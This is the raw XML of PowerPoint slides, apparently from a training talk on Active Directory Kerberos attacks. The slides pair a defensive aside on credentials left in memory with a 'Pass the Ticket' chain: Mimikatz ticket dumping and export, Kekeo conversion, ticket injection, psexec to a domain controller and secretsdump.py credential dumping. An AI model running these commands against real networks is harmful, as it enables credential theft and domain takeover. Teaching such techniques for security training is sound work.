          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8079454" y="1136049"/>
            <a:ext cx="369436" cy="390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E91EFD-2C17-4863-B014-795940FB00B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7668600" y="4713869"/>
            <a:ext cx="410854" cy="200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56FD52-B117-465D-BD4E-C0E36C09EAE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3191309" y="3090935"/>
            <a:ext cx="3925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D363652-786B-412E-ABF0-0DBD606E259A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384960" y="2944899"/>
            <a:ext cx="2370650" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Untrusted network</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65FA3ED5-8583-4498-B77A-9F31E1A49005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7832888" y="2024084"/>
            <a:ext cx="1593931" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Session Keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C9F21F-F87B-4317-A989-AFB2CFDEDA36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9681396" y="2268609"/>
            <a:ext cx="2118095" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Long Term Keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496D26BC-9BE2-44E8-BB55-5154EA4F2167}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10347320" y="1623755"/>
            <a:ext cx="393123" cy="56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E97610-EF7C-4386-BC7C-46D2742E6CB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9086403" y="1526194"/>
            <a:ext cx="340416" cy="497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374F87B-57E5-4404-A376-2A3FC339A76F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224951" y="4642349"/>
            <a:ext cx="1522087" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tickets containing Session Keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A79BCDE-1596-4733-B04F-44E2441236A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1469385" y="4081833"/>
            <a:ext cx="195048" cy="493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16F62D1-708F-4A73-8F7C-EAFA99F8EEBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953647" y="1669441"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1900032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77B3-287B-4BC4-85DD-327884DFDD2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apart: A quick word about credentials in Memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{020B288E-C3D7-47F1-B7C4-336045C61893}"/>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2004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D504-D229-E14F-A27F-D3DD73EF3F43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>A quick word about credentials in memory </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B040FA08-33C4-3A46-B2CA-3D0471D079F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logging on Interactively to a computer leaves your credentials in memory on the target computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logging off *should* clear them, but they can be left orphaned in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows 8 and later wipe the plaintext password from memory (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wdigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> disabled)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KB2871997</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Protected Users” AD Security Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No NTLM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No Digest auth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CredSSP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Ticket TTL reduced from 10HR to 4HR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No RC4/DES keys used for Kerberos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="473137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86C2-E890-422C-AF99-A29D8B277D40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 6: Abusing Tickets From Memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54AF1317-78B7-4D57-9439-5DD98CEE035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03125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1903-6D1A-489D-ABC6-93630EC2CC28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dumping Tickets from Memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F2ED1F9-4817-434E-9EDD-3CD40276ED97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires admin access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>outputdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>outputdir</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mimikatz.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege::debug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>::tickets </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>::tickets /export</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Want ones with @krbtgt-DOMAIN.COM in the filename</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Convert to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kirbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ccache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kekeo.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Misc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>::convert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ccache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>filename@krbtgt-DOMAIN.COM.kirbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="448890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A4EE-B493-4F8D-8DD1-CAEE9D5F8792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Cracking Dumped Tickets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2217F4C-F520-4FB2-8C1B-C369A0E2BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…Sure… its encrypted with the user’s key which is derived from their password….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…But… why bother….?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3304169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0775-B4BB-2649-A946-362B6C7D0C06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass The Ticket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4C436B1-CF8A-5246-A9DA-BD3FD9FCF45B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dump the ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crack the ticket to get the password for the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the password to make a ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the ticket to authenticate to the domain…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>….wait a minute…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2962429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EA8A-4D34-403A-81FC-F862372D5999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Pass the Ticket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C40B45A5-A036-4D1E-AC54-B4F9CC9B12ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the ticket while its fresh!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Import it into your keychain, and your system will keep renewing it for you…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the session you want to add the ticket to… don’t need admin permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mimikatz.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TGT_FILE.kirbi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>klist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\\dc1.domain.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cmd.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2287620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AB79C-6111-48E9-8CDA-6BD619C010C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass the Ticket</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5FB8EA1-A59E-4EB5-9BE3-980C9A856DB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Linux:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup Kerberos tools on Linux (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-user / krb5-workstation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>configure a Realm in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/krb5.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ccache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kekeo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/krb5cc_0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>secretsdump.py –no-pass –k –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>outputfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> secrets.txt DOMAIN.COM/USER@dc1.domain.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
